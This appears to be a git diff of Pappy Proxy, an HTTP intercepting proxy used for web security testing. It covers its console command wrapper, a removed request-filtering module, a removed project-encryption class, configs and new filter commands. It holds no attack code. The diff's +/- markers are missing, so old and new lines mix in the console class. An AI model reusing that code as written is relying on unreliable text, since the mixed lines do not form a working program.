macros.load_cmds(cons)
tags.load_cmds(cons)
##########
## Classes
class ProxyCmd(cmd2.Cmd):
class SessionEnd(Exception):
pass
class CommandError(Exception):
pass
class Cmd(cmd2.Cmd):
"""
An object representing the console interface. Provides methods to add
commands and aliases to the console.
commands and aliases to the console. Implemented as a hack around cmd2.Cmd
"""
def __init__(self, *args, **kwargs):
# the \x01/\x02 are to make the prompt behave properly with the readline library
self.prompt = 'pappy\x01' + Colors.YELLOW + '\x02> \x01' + Colors.ENDC + '\x02'
self.debug = True
self.session = kwargs['session']
del kwargs['session']
self.histsize = 0
if 'histsize' in kwargs:
self.histsize = kwargs['histsize']
del kwargs['histsize']
if 'client' not in kwargs:
raise Exception("client argument is required")
self.client = kwargs['client']
self.client.console = self
del kwargs['client']
self._cmds = {}
self._aliases = {}
# Only read and save history when not in crypto mode
if not self.session.config.crypt_session:
atexit.register(self.save_histfile)
readline.set_history_length(self.session.config.histsize)
if os.path.exists('cmdhistory'):
if self.session.config.histsize != 0:
readline.read_history_file('cmdhistory')
else:
os.remove('cmdhistory')
atexit.register(self.save_histfile)
readline.set_history_length(self.histsize)
if os.path.exists('cmdhistory'):
if self.histsize != 0:
readline.read_history_file('cmdhistory')
else:
os.remove('cmdhistory')
cmd2.Cmd.__init__(self, *args, **kwargs)
@@ -61,8 +91,8 @@ class ProxyCmd(cmd2.Cmd):
ret.update(self.__dict__.keys())
ret.update(['do_'+k for k in self._cmds.keys()])
ret.update(['help_'+k for k in self._cmds.keys()])
ret.update(['complete_'+k for k, v in self._cmds.iteritems() if self._cmds[k][1]])
for k, v in self._aliases.iteritems():
ret.update(['complete_'+k for k, v in self._cmds.items() if self._cmds[k][1]])
for k, v in self._aliases.items():
ret.add('do_' + k)
ret.add('help_' + k)
if self._cmds[self._aliases[k]][1]:
@@ -74,23 +104,39 @@ class ProxyCmd(cmd2.Cmd):
def f():
if not func.__doc__:
to_print = 'No help exists for function'
lines = func.__doc__.splitlines()
if len(lines) > 0 and lines[0] == '':
lines = lines[1:]
if len(lines) > 0 and lines[-1] == '':
lines = lines[:-1]
to_print = '\n'.join(string.lstrip(l) for l in lines)
print to_print
else:
lines = func.__doc__.splitlines()
if len(lines) > 0 and lines[0] == '':
lines = lines[1:]
if len(lines) > 0 and lines[-1] == '':
lines = lines[:-1]
to_print = '\n'.join(l.lstrip() for l in lines)
aliases = set()
aliases.add(attr[5:])
for i in range(2):
for k, v in self._aliases.items():
if k in aliases or v in aliases:
aliases.add(k)
aliases.add(v)
to_print += '\nAliases: ' + ', '.join(aliases)
print(to_print)
return f
def gen_dofunc(func, client):
def f(line):
args = shlex.split(line)
func(client, args)
return print_errors(f)
if attr.startswith('do_'):
command = attr[3:]
if command in self._cmds:
return print_pappy_errors(self._cmds[command][0])
return gen_dofunc(self._cmds[command][0], self.client)
elif command in self._aliases:
real_command = self._aliases[command]
if real_command in self._cmds:
return print_pappy_errors(self._cmds[real_command][0])
return gen_dofunc(self._cmds[real_command][0], self.client)
elif attr.startswith('help_'):
command = attr[5:]
if command in self._cmds:
@@ -111,13 +157,20 @@ class ProxyCmd(cmd2.Cmd):
return self._cmds[real_command][1]
raise AttributeError(attr)
def run_args(self, args):
command = args[0]
if command in self._cmds:
self._cmds[command][0](self.client, args[1:])
elif command in self._aliases:
real_command = self._aliases[command]
if real_command in self._cmds:
self._cmds[real_command][0](self.client, args[1:])
def save_histfile(self):
# Only write to file if not in crypto mode
if not self.session.config.crypt_session:
# Write the command to the history file
if self.session.config.histsize != 0:
readline.set_history_length(self.session.config.histsize)
readline.write_history_file('cmdhistory')
# Write the command to the history file
if self.histsize != 0:
readline.set_history_length(self.histsize)
readline.write_history_file('cmdhistory')
def get_names(self):
# Hack to get cmd to recognize do_/etc functions as functions for things
@@ -136,7 +189,7 @@ class ProxyCmd(cmd2.Cmd):
{'command': (do_func, autocomplete_func)}
Use autocomplete_func=None for no autocomplete function
"""
for command, vals in cmd_dict.iteritems():
for command, vals in cmd_dict.items():
do_func, ac_func = vals
self.set_cmd(command, do_func, ac_func)
@@ -145,6 +198,8 @@ class ProxyCmd(cmd2.Cmd):
Add an alias for a command.
ie add_alias("foo", "f") will let you run the 'foo' command with 'f'
"""
if command not in self._cmds:
raise KeyError()
self._aliases[alias] = command
def add_aliases(self, alias_list):
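
Under the new Cmd wrapper, commands are plain functions taking (client, args); set_cmds wires them in via a {'command': (do_func, autocomplete_func)} dict, and gen_dofunc handles shlex splitting and error printing. A registration sketch (the command body is illustrative, and it assumes add_aliases takes (command, alias) pairs, matching add_alias):

# Registration sketch for the Cmd wrapper above.
def ping_cmd(client, args):
    """
    Check that the proxy backend is alive.
    Usage: ping
    """
    print('pong (%d args)' % len(args))

def load_cmds(cons):
    cons.set_cmds({
        'ping': (ping_cmd, None),   # None: no autocomplete function
    })
    cons.add_aliases([
        ('ping', 'p'),              # 'p' now runs the 'ping' command
    ])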

View file

@@ -1,799 +0,0 @@
import crochet
import re
import shlex
import json
from .http import Request, Response, RepeatableDict
from twisted.internet import defer
from util import PappyException
"""
context.py
Functions and classes involved with managing the current context and filters
"""
scope = []
_BARE_COMPARERS = ('ex','nex')
class Context(object):
"""
A class representing a set of requests that pass a set of filters
:ivar active_filters: Filters that are currently applied to the context
:vartype active_filters: List of functions that take one :class:`pappyproxy.http.Request` and return either true or false.
:ivar active_requests: Requests which pass all the filters applied to the context
:vartype active_requests: List of Requests
:ivar inactive_requests: Requests which do not pass all the filters applied to the context
:vartype inactive_requests: List of Requests
"""
def __init__(self):
self.active_filters = []
self.complete = True
self.active_requests = []
@staticmethod
def get_memid():
i = 'm%d' % Context._next_in_mem_id
Context._next_in_mem_id += 1
return i
def cache_reset(self):
self.active_requests = []
self.complete = False
def add_filter(self, filt):
"""
Add a filter to the context. This will remove any requests that do not pass
the filter from the ``active_requests`` set.
:param filt: The filter to add
:type filt: Function that takes one :class:`pappyproxy.http.Request` and returns either true or false. (or a :class:`pappyproxy.context.Filter`)
"""
self.active_filters.append(filt)
self.cache_reset()
@defer.inlineCallbacks
def add_filter_string(self, filtstr):
"""
Add a filter to the context by filter string
"""
f = Filter(filtstr)
yield f.generate()
self.add_filter(f)
def filter_up(self):
"""
Removes the last filter that was applied to the context.
"""
# Deletes the last filter of the context
if self.active_filters:
self.active_filters = self.active_filters[:-1]
self.cache_reset()
def set_filters(self, filters):
"""
Set the list of filters for the context.
"""
self.active_filters = filters[:]
self.cache_reset()
@defer.inlineCallbacks
def get_reqs(self, n=-1):
# This is inefficient but I want it to work for now, and as long as we
# don't put the full requests in memory I don't care.
ids = self.active_requests
if (len(ids) >= n and n != -1) or self.complete == True:
if n == -1:
defer.returnValue(ids)
else:
defer.returnValue(ids[:n])
ids = []
for req_d in Request.cache.req_it():
r = yield req_d
passed = True
for filt in self.active_filters:
if not filt(r):
passed = False
break
if passed:
self.active_requests.append(r.reqid)
ids.append(r.reqid)
if len(ids) >= n and n != -1:
defer.returnValue(ids[:n])
self.complete = True
defer.returnValue(ids)
class FilterParseError(PappyException):
pass
def cmp_is(a, b):
if a is None or b is None:
return False
return str(a) == str(b)
def cmp_contains(a, b):
if a is None or b is None:
return False
return (b.lower() in a.lower())
def cmp_exists(a, b=None):
# Bare comparers ('ex'/'nex') are called with b=None, so only check a
if a is None:
return False
return (a != [])
def cmp_len_eq(a, b):
if a is None or b is None:
return False
return (len(a) == int(b))
def cmp_len_gt(a, b):
if a is None or b is None:
return False
return (len(a) > int(b))
def cmp_len_lt(a, b):
if a is None or b is None:
return False
return (len(a) < int(b))
def cmp_eq(a, b):
if a is None or b is None:
return False
return (int(a) == int(b))
def cmp_gt(a, b):
if a is None or b is None:
return False
return (int(a) > int(b))
def cmp_lt(a, b):
if a is None or b is None:
return False
return (int(a) < int(b))
def cmp_containsr(a, b):
if a is None or b is None:
return False
try:
if re.search(b, a):
return True
return False
except re.error as e:
raise PappyException('Invalid regexp: %s' % e)
def relation_from_text(s, val=''):
# Gets the relation function associated with the string
# Returns none if not found
def negate_func(func):
def f(*args, **kwargs):
return not func(*args, **kwargs)
return f
negate = False
if s[0] == 'n':
negate = True
s = s[1:]
if s in ("is",):
retfunc = cmp_is
elif s in ("contains", "ct"):
retfunc = cmp_contains
elif s in ("containsr", "ctr"):
validate_regexp(val)
retfunc = cmp_containsr
elif s in ("exists", "ex"):
retfunc = cmp_exists
elif s in ("Leq",):
retfunc = cmp_len_eq
elif s in ("Lgt",):
retfunc = cmp_len_gt
elif s in ("Llt",):
retfunc = cmp_len_lt
elif s in ("eq",):
retfunc = cmp_eq
elif s in ("gt",):
retfunc = cmp_gt
elif s in ("lt",):
retfunc = cmp_lt
else:
raise FilterParseError("Invalid relation: %s" % s)
if negate:
return negate_func(retfunc)
else:
return retfunc
def compval_from_args(args):
"""
NOINDEX
returns a function that compares to a value from text.
ie compval_from_text('ct foo') will return a function that returns true
if the passed in string contains foo.
"""
if len(args) == 0:
raise PappyException('Invalid number of arguments')
if args[0] in _BARE_COMPARERS:
if len(args) != 1:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], None)
value = None
else:
if len(args) != 2:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], args[1])
value = args[1]
def retfunc(s):
return comparer(s, value)
return retfunc
def compval_from_args_repdict(args):
"""
NOINDEX
Similar to compval_from_args but checks a repeatable dict with up to 2
comparers and values.
"""
if len(args) == 0:
raise PappyException('Invalid number of arguments')
nextargs = args[:]
value = None
if args[0] in _BARE_COMPARERS:
comparer = relation_from_text(args[0], None)
if len(args) > 1:
nextargs = args[1:]
else:
if len(args) == 1:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], args[1])
value = args[1]
nextargs = args[2:]
comparer2 = None
value2 = None
if nextargs:
if nextargs[0] in _BARE_COMPARERS:
comparer2 = relation_from_text(nextargs[0], None)
else:
if len(nextargs) == 1:
raise PappyException('Invalid number of arguments')
comparer2 = relation_from_text(nextargs[0], nextargs[1])
value2 = nextargs[1]
def retfunc(d):
for k, v in d.all_pairs():
if comparer2 is None:
if comparer(k, value) or comparer(v, value):
return True
else:
if comparer(k, value) and comparer2(v, value2):
return True
return False
return retfunc
def gen_filter_by_all(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return compval(req.full_message) and ((not req.response) or compval(req.response.full_message))
else:
return compval(req.full_message) or (req.response and compval(req.response.full_message))
return f
def gen_filter_by_host(args):
compval = compval_from_args(args)
def f(req):
return compval(req.host)
return f
def gen_filter_by_body(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return compval(req.body) and ((not req.response) or compval(req.response.body))
else:
return compval(req.body) or (req.response and compval(req.response.body))
return f
def gen_filter_by_req_body(args):
compval = compval_from_args(args)
def f(req):
return compval(req.body)
return f
def gen_filter_by_rsp_body(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return (not req.response) or compval(req.response.body)
else:
return req.response and compval(req.response.body)
return f
def gen_filter_by_raw_headers(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
# compval already negates comparison
return compval(req.headers_section) and ((not req.response) or compval(req.response.headers_section))
else:
return compval(req.headers_section) or (req.response and compval(req.response.headers_section))
return f
def gen_filter_by_response_code(args):
compval_from_args(args) # try and throw an error
def f(req):
if not req.response:
return False
compval = compval_from_args(args)
return compval(req.response.response_code)
return f
def gen_filter_by_path(args):
compval = compval_from_args(args)
def f(req):
return compval(req.path)
return f
def gen_filter_by_responsetime(args):
compval = compval_from_args(args)
def f(req):
return compval(req.rsptime)
return f
def gen_filter_by_verb(args):
compval = compval_from_args(args)
def f(req):
return compval(req.verb)
return f
def gen_filter_by_tag(args):
compval = compval_from_args(args)
def f(req):
for tag in req.tags:
if compval(tag):
return True
return False
return f
def gen_filter_by_saved(args):
if len(args) != 0:
raise PappyException('Invalid number of arguments')
def f(req):
if req.saved:
return True
else:
return False
return f
@defer.inlineCallbacks
def gen_filter_by_before(args):
if len(args) != 1:
raise PappyException('Invalid number of arguments')
r = yield Request.load_request(args[0])
def f(req):
if req.time_start is None:
return False
if r.time_start is None:
return False
return req.time_start <= r.time_start
defer.returnValue(f)
@defer.inlineCallbacks
def gen_filter_by_after(args, negate=False):
if len(args) != 1:
raise PappyException('Invalid number of arguments')
r = yield Request.load_request(args[0])
def f(req):
if req.time_start is None:
return False
if r.time_start is None:
return False
return req.time_start >= r.time_start
defer.returnValue(f)
def gen_filter_by_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
if args[0][0] == 'n':
return comparer(req.headers) and ((not req.response) or comparer(req.response.headers))
else:
return comparer(req.headers) or (req.response and comparer(req.response.headers))
return f
def gen_filter_by_request_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.headers)
return f
def gen_filter_by_response_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
if args[0][0] == 'n':
return (not req.response) or comparer(req.response.headers)
else:
return req.response and comparer(req.response.headers)
return f
def gen_filter_by_submitted_cookies(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.cookies)
return f
def gen_filter_by_set_cookies(args):
comparer = compval_from_args_repdict(args)
def f(req):
if not req.response:
return False
checkdict = RepeatableDict()
for k, v in req.response.cookies.all_pairs():
checkdict[k] = v.cookie_str
return comparer(checkdict)
return f
def gen_filter_by_url_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.url_params)
return f
def gen_filter_by_post_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.post_params)
return f
def gen_filter_by_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.url_params) or comparer(req.post_params)
return f
@defer.inlineCallbacks
def gen_filter_by_inverse(args):
filt = yield Filter.from_filter_string(parsed_args=args)
def f(req):
return not filt(req)
defer.returnValue(f)
def gen_filter_by_websocket(args):
def f(req):
if not req.response:
return False
if Response.is_ws_upgrade(req.response):
return True
return False
return f
@defer.inlineCallbacks
def filter_reqs(reqids, filters):
to_delete = set()
# Could definitely be more efficient, but it stays like this until
# it impacts performance
requests = []
for reqid in reqids:
r = yield Request.load_request(reqid)
requests.append(r)
for req in requests:
for filt in filters:
if not filt(req):
to_delete.add(req)
retreqs = []
retdel = []
for r in requests:
if r in to_delete:
retdel.append(r.reqid)
else:
retreqs.append(r.reqid)
defer.returnValue((retreqs, retdel))
def passes_filters(request, filters):
for filt in filters:
if not filt(request):
return False
return True
def in_scope(request):
global scope
passes = passes_filters(request, scope)
return passes
def set_scope(filters):
global scope
scope = filters
def save_scope(context):
global scope
scope = context.active_filters[:]
def reset_to_scope(context):
global scope
context.active_filters = scope[:]
context.cache_reset()
def print_scope():
global scope
for f in scope:
print f.filter_string
@defer.inlineCallbacks
def store_scope(dbpool):
# Delete the old scope
yield dbpool.runQuery(
"""
DELETE FROM scope
"""
);
# Insert the new scope
i = 0
for f in scope:
yield dbpool.runQuery(
"""
INSERT INTO scope (filter_order, filter_string) VALUES (?, ?);
""",
(i, f.filter_string)
);
i += 1
@defer.inlineCallbacks
def load_scope(dbpool):
global scope
rows = yield dbpool.runQuery(
"""
SELECT filter_order, filter_string FROM scope;
""",
)
rows = sorted(rows, key=lambda r: int(r[0]))
new_scope = []
for row in rows:
new_filter = Filter(row[1])
yield new_filter.generate()
new_scope.append(new_filter)
scope = new_scope
@defer.inlineCallbacks
def clear_tag(tag):
# Remove a tag from every request
reqs = yield Request.cache.load_by_tag(tag)
for req in reqs:
req.tags.discard(tag)
if req.saved:
yield req.async_save()
reset_context_caches()
@defer.inlineCallbacks
def async_set_tag(tag, reqs):
"""
async_set_tag(tag, reqs)
Remove the tag from every request then add the given requests to memory and
give them the tag. The async version.
:param tag: The tag to set
:type tag: String
:param reqs: The requests to assign to the tag
:type reqs: List of Requests
"""
yield clear_tag(tag)
for req in reqs:
req.tags.add(tag)
Request.cache.add(req)
reset_context_caches()
@defer.inlineCallbacks
def save_context(name, filter_strings, dbpool):
"""
Saves the filter strings to the datafile using their name
"""
rows = yield dbpool.runQuery(
"""
SELECT id FROM saved_contexts WHERE context_name=?;
""", (name,)
)
list_str = json.dumps(filter_strings)
if len(rows) > 0:
yield dbpool.runQuery(
"""
UPDATE saved_contexts SET filter_strings=?
WHERE context_name=?;
""", (list_str, name)
)
else:
yield dbpool.runQuery(
"""
INSERT INTO saved_contexts (context_name, filter_strings)
VALUES (?,?);
""", (name, list_str)
)
@defer.inlineCallbacks
def delete_saved_context(name, dbpool):
yield dbpool.runQuery(
"""
DELETE FROM saved_contexts WHERE context_name=?;
""", (name,)
)
@defer.inlineCallbacks
def get_saved_context(name, dbpool):
rows = yield dbpool.runQuery(
"""
SELECT filter_strings FROM saved_contexts WHERE context_name=?;
""", (name,)
)
if len(rows) == 0:
raise PappyException("Saved context with name %s does not exist" % name)
filter_strs = json.loads(rows[0][0])
defer.returnValue(filter_strs)
@defer.inlineCallbacks
def get_all_saved_contexts(dbpool):
rows = yield dbpool.runQuery(
"""
SELECT context_name, filter_strings FROM saved_contexts;
""",
)
all_strs = {}
for row in rows:
all_strs[row[0]] = json.loads(row[1])
defer.returnValue(all_strs)
@crochet.wait_for(timeout=180.0)
@defer.inlineCallbacks
def set_tag(tag, reqs):
"""
set_tag(tag, reqs)
Remove the tag from every request then add the given requests to memory and
give them the tag. The non-async version.
:param tag: The tag to set
:type tag: String
:param reqs: The requests to assign to the tag
:type reqs: List of Requests
"""
yield async_set_tag(tag, reqs)
def validate_regexp(r):
try:
re.compile(r)
except re.error as e:
raise PappyException('Invalid regexp: %s' % e)
def reset_context_caches():
import pappyproxy.pappy
for c in pappyproxy.pappy.all_contexts:
c.cache_reset()
class Filter(object):
"""
A class representing a filter. Its claim to fame is that you can use
:func:`pappyproxy.context.Filter.from_filter_string` to generate a
filter from a filter string.
"""
_filter_functions = {
"all": gen_filter_by_all,
"host": gen_filter_by_host,
"domain": gen_filter_by_host,
"hs": gen_filter_by_host,
"dm": gen_filter_by_host,
"path": gen_filter_by_path,
"pt": gen_filter_by_path,
"body": gen_filter_by_body,
"bd": gen_filter_by_body,
"data": gen_filter_by_body,
"dt": gen_filter_by_body,
"reqbody": gen_filter_by_req_body,
"qbd": gen_filter_by_req_body,
"reqdata": gen_filter_by_req_body,
"qdt": gen_filter_by_req_body,
"rspbody": gen_filter_by_rsp_body,
"sbd": gen_filter_by_rsp_body,
"qspdata": gen_filter_by_rsp_body,
"sdt": gen_filter_by_rsp_body,
"verb": gen_filter_by_verb,
"vb": gen_filter_by_verb,
"param": gen_filter_by_params,
"pm": gen_filter_by_params,
"header": gen_filter_by_headers,
"hd": gen_filter_by_headers,
"reqheader": gen_filter_by_request_headers,
"qhd": gen_filter_by_request_headers,
"rspheader": gen_filter_by_response_headers,
"shd": gen_filter_by_response_headers,
"rawheaders": gen_filter_by_raw_headers,
"rh": gen_filter_by_raw_headers,
"sentcookie": gen_filter_by_submitted_cookies,
"sck": gen_filter_by_submitted_cookies,
"setcookie": gen_filter_by_set_cookies,
"stck": gen_filter_by_set_cookies,
"statuscode": gen_filter_by_response_code,
"sc": gen_filter_by_response_code,
"responsecode": gen_filter_by_response_code,
"tag": gen_filter_by_tag,
"tg": gen_filter_by_tag,
"saved": gen_filter_by_saved,
"svd": gen_filter_by_saved,
"websocket": gen_filter_by_websocket,
"ws": gen_filter_by_websocket,
}
_async_filter_functions = {
"before": gen_filter_by_before,
"b4": gen_filter_by_before,
"bf": gen_filter_by_before,
"after": gen_filter_by_after,
"af": gen_filter_by_after,
"inv": gen_filter_by_inverse,
}
def __init__(self, filter_string):
self.filter_string = filter_string
def __call__(self, *args, **kwargs):
return self.filter_func(*args, **kwargs)
def __repr__(self):
return '<Filter "%s">' % self.filter_string
@defer.inlineCallbacks
def generate(self):
self.filter_func = yield self.from_filter_string(self.filter_string)
@staticmethod
@defer.inlineCallbacks
def from_filter_string(filter_string=None, parsed_args=None):
"""
from_filter_string(filter_string)
Create a filter from a filter string. If passed a list of arguments, they
will be used instead of parsing the string.
:rtype: Deferred that returns a :class:`pappyproxy.context.Filter`
"""
if parsed_args is not None:
args = parsed_args
else:
args = shlex.split(filter_string)
if len(args) == 0:
raise PappyException('Field is required')
field = args[0]
new_filter = None
field_args = args[1:]
if field in Filter._filter_functions:
new_filter = Filter._filter_functions[field](field_args)
elif field in Filter._async_filter_functions:
new_filter = yield Filter._async_filter_functions[field](field_args)
else:
raise FilterParseError("%s is not a valid field" % field)
if new_filter is None:
raise FilterParseError("Error creating filter")
defer.returnValue(new_filter)
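
The filter strings removed here are `field relation value` triples: the field selects a generator from _filter_functions, relation_from_text resolves the relation (an 'n' prefix negates it), and bare comparers like 'ex' take no value. The comparer layer can be exercised on its own, independent of Twisted:

# Sketch exercising the comparer layer defined above.
f = compval_from_args(['ct', 'login'])               # "contains"
print(f('/user/login'))                              # True
print(f('/index.html'))                              # False

f = compval_from_args(['nctr', r'\.(png|jpg|gif)$']) # negated regexp match
print(f('/app.js'))                                  # True: no image extension
print(f('/logo.png'))                                # False

f = compval_from_args(['ex'])                        # bare comparer: "exists"
print(f('anything'))                                 # True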

View file

@@ -1,236 +0,0 @@
#!/usr/bin/env python
import crochet
import getpass
import glob
import os
import pappyproxy
import scrypt
import shutil
import twisted
from . import compress
from .util import PappyException
from base64 import b64encode, b64decode
from cryptography.fernet import Fernet, InvalidToken
from twisted.internet import reactor, defer
class Crypto(object):
def __init__(self, sessconfig):
self.config = sessconfig
self.archive = sessconfig.archive
self.compressor = compress.Compress(sessconfig)
self.key = None
self.password = None
self.salt = None
def encrypt_project(self):
"""
Compress and encrypt the project files,
deleting clear-text files afterwards
"""
# Leave the crypto working directory
if self.config.crypt_dir in os.getcwd():
os.chdir('../')
self.compressor.compress_project()
# Get the password and salt, then derive the key
self.crypto_ramp_up()
# Create project and crypto archive
archive_file = open(self.archive, 'rb')
archive_crypt = open(self.config.crypt_file, 'wb')
try:
# Encrypt the archive read as a bytestring
fern = Fernet(self.key)
crypt_token = fern.encrypt(archive_file.read())
archive_crypt.write(crypt_token)
except InvalidToken as e:
raise PappyException("Error encrypting project: ", e)
return False
archive_file.close()
archive_crypt.close()
# Store the salt for the next decryption
self.create_salt_file()
# Delete clear-text files
self.delete_clear_files()
return True
def decrypt_project(self):
"""
Decrypt and decompress the project files
"""
# Decrypt and decompress the project if crypt_file exists
if os.path.isfile(self.config.crypt_file):
cf = self.config.crypt_file
sl = self.config.salt_len
crl = os.path.getsize(cf) - sl
archive_crypt = open(cf, 'rb').read(crl)
archive_file = open(self.config.archive, 'wb')
retries = 3
while True:
try:
self.crypto_ramp_up()
fern = Fernet(self.key)
archive = fern.decrypt(archive_crypt)
break
except InvalidToken as e:
print "Invalid decryption: ", e
retries -= 1
# Quit pappy if user doesn't retry
# or if all retries are exhausted
if not self.confirm_password_retry() or retries <= 0:
os.remove(self.config.archive)
return False
else:
self.password = None
self.key = None
pass
archive_file.write(archive)
archive_file.close()
self.compressor.decompress_project()
self.delete_crypt_files()
os.chdir(self.config.crypt_dir)
return True
# If project exited before encrypting the working directory
# change to the working directory to resume the session
elif os.path.isdir(self.config.crypt_dir):
os.chdir(self.config.crypt_dir)
return True
# If project hasn't been encrypted before,
# setup crypt working directory
else:
os.mkdir(self.config.crypt_dir)
project_files = self.config.get_project_files()
for pf in project_files:
shutil.copy2(pf, self.config.crypt_dir)
os.chdir(self.config.crypt_dir)
return True
def confirm_password_retry(self):
answer = raw_input("Re-enter your password? (y/n): ").strip()
return answer.lower().startswith("y")
def crypto_ramp_up(self):
if not self.password:
self.get_password()
if not self.salt:
self.set_salt()
self.derive_key()
def get_password(self):
"""
Retrieve password from the user. Raise an exception if the
password is not capable of utf-8 encoding.
"""
encoded_passwd = ""
try:
passwd = getpass.getpass("Enter a password: ").strip()
self.password = passwd.encode("utf-8")
except:
raise PappyException("Invalid password, try again")
def set_salt(self):
if self.config.crypt_dir in os.getcwd():
os.chdir('../')
self.set_salt_from_file()
os.chdir(self.config.crypt_dir)
elif os.path.isfile(self.config.crypt_file):
self.set_salt_from_file()
else:
self.salt = os.urandom(16)
def set_salt_from_file(self):
try:
# Seek to `salt_len` bytes before the EOF
# then read `salt_len` bytes to retrieve the salt
# WARNING: must open `crypt_file` in `rb` mode
# or `salt_file.seek()` will result in undefined
# behavior.
salt_file = open(self.config.crypt_file, 'rb')
sl = self.config.salt_len
# Negate the salt length to seek to the
# correct position in the buffer
salt_file.seek(-sl, 2)
self.salt = salt_file.read(sl)
salt_file.close()
except:
cf = self.config.crypt_file
raise PappyException("Unable to read %s" % cf)
def create_salt_file(self):
salt_file = open(self.config.crypt_file, 'a')
salt_file.write(self.salt)
salt_file.close()
def derive_key(self):
"""
Derive a key sufficient for use as a cryptographic key
used to encrypt the project (currently: cryptography.Fernet).
cryptography.Fernet utilizes AES-CBC-128, requiring a 32-byte key.
Parameter notes from the py-scrypt source-code:
https://bitbucket.org/mhallin/py-scrypt/
Compute scrypt(password, salt, N, r, p, buflen).
The parameters r, p, and buflen must satisfy r * p < 2^30 and
buflen <= (2^32 - 1) * 32. The parameter N must be a power of 2
greater than 1. N, r and p must all be positive.
Notes for Python 2:
- `password` and `salt` must be str instances
- The result will be a str instance
Notes for Python 3:
- `password` and `salt` can be both str and bytes. If they are str
instances, they will be encoded with utf-8.
- The result will be a bytes instance
Exceptions raised:
- TypeError on invalid input
- scrypt.error if scrypt failed
"""
try:
if not self.key:
shash = scrypt.hash(self.password, self.salt, buflen=32)
self.key = b64encode(shash)
except TypeError as e:
raise PappyException("Scrypt failed with type error: ", e)
except scrypt.error, e:
raise PappyException("Scrypt failed with internal error: ", e)
def delete_clear_files(self):
"""
Deletes all clear-text files left in the project directory.
"""
shutil.rmtree(self.config.crypt_dir)
os.remove(self.config.archive)
def delete_crypt_files(self):
"""
Deletes all encrypted-text files in the project directory.
Forces generation of new salt after opening and closing the project.
Adds security in the case of a one-time compromise of the system.
"""
os.remove(self.config.crypt_file)
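# A minimal sketch of the scheme this class implemented (scrypt-derived key,
# Fernet encryption, salt appended to the encrypted file). Parameters mirror
# derive_key/set_salt_from_file above; this is an illustration, not the
# removed implementation.
import os
from base64 import b64encode
import scrypt
from cryptography.fernet import Fernet

def seal(data, password):
    # Derive a 32-byte key, then append the salt so decryption can recover it
    salt = os.urandom(16)
    key = b64encode(scrypt.hash(password, salt, buflen=32))
    return Fernet(key).encrypt(data) + salt

def unseal(blob, password, salt_len=16):
    # The last salt_len bytes are the salt; the rest is the Fernet token
    token, salt = blob[:-salt_len], blob[-salt_len:]
    key = b64encode(scrypt.hash(password, salt, buflen=32))
    return Fernet(key).decrypt(token)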

View file

@ -1,3 +0,0 @@
{
"cache_size": 2000
}

View file

@ -1,9 +0,0 @@
{
"data_file": "./data.db",
"cert_dir": "{DATADIR}/certs",
"history_size": 1000,
"proxy_listeners": [
{"port": 8000, "interface": "127.0.0.1"}
],
"socks_proxy": null
}

File diff suppressed because it is too large

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View file

@ -0,0 +1,245 @@
from itertools import groupby
from ..proxy import InvalidQuery, time_to_nsecs
from ..colors import Colors, Styles
# class BuiltinFilters(object):
# _filters = {
# 'not_image': (
# ['path nctr "(\.png$|\.jpg$|\.gif$)"'],
# 'Filter out image requests',
# ),
# 'not_jscss': (
# ['path nctr "(\.js$|\.css$)"'],
# 'Filter out javascript and css files',
# ),
# }
# @staticmethod
# @defer.inlineCallbacks
# def get(name):
# if name not in BuiltinFilters._filters:
# raise PappyException('%s is not a built-in filter' % name)
# if name in BuiltinFilters._filters:
# filters = [pappyproxy.context.Filter(f) for f in BuiltinFilters._filters[name][0]]
# for f in filters:
# yield f.generate()
# defer.returnValue(filters)
# raise PappyException('"%s" is not a built-in filter' % name)
# @staticmethod
# def list():
# return [k for k, v in BuiltinFilters._filters.iteritems()]
# @staticmethod
# def help(name):
# if name not in BuiltinFilters._filters:
# raise PappyException('"%s" is not a built-in filter' % name)
# return pappyproxy.context.Filter(BuiltinFilters._filters[name][1])
# def complete_filtercmd(text, line, begidx, endidx):
# strs = [k for k, v in pappyproxy.context.Filter._filter_functions.iteritems()]
# strs += [k for k, v in pappyproxy.context.Filter._async_filter_functions.iteritems()]
# return autocomplete_startswith(text, strs)
# def complete_builtin_filter(text, line, begidx, endidx):
# all_names = BuiltinFilters.list()
# if not text:
# ret = all_names[:]
# else:
# ret = [n for n in all_names if n.startswith(text)]
# return ret
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def builtin_filter(line):
# if not line:
# raise PappyException("Filter name required")
# filters_to_add = yield BuiltinFilters.get(line)
# for f in filters_to_add:
# print f.filter_string
# yield pappyproxy.pappy.main_context.add_filter(f)
# defer.returnValue(None)
def filtercmd(client, args):
"""
Apply a filter to the current context
Usage: filter <filter string>
See README.md for information on filter strings
"""
try:
phrases = [list(group) for k, group in groupby(args, lambda x: x == "OR") if not k]
for phrase in phrases:
# we do before/after by id not by timestamp
if phrase[0] in ('before', 'b4', 'after', 'af') and len(phrase) > 1:
r = client.req_by_id(phrase[1], headers_only=True)
phrase[1] = str(time_to_nsecs(r.time_start))
client.context.apply_phrase(phrases)
except InvalidQuery as e:
print(e)
def filter_up(client, args):
"""
Remove the last applied filter
Usage: filter_up
"""
client.context.pop_phrase()
def filter_clear(client, args):
"""
Reset the context so that it contains no filters (ignores scope)
Usage: filter_clear
"""
client.context.set_query([])
def filter_list(client, args):
"""
Print the filters that make up the current context
Usage: filter_list
"""
from ..util import print_query
print_query(client.context.query)
def scope_save(client, args):
"""
Set the scope to be the current context. Saved between launches
Usage: scope_save
"""
client.set_scope(client.context.query)
def scope_reset(client, args):
"""
Set the context to be the scope (view in-scope items)
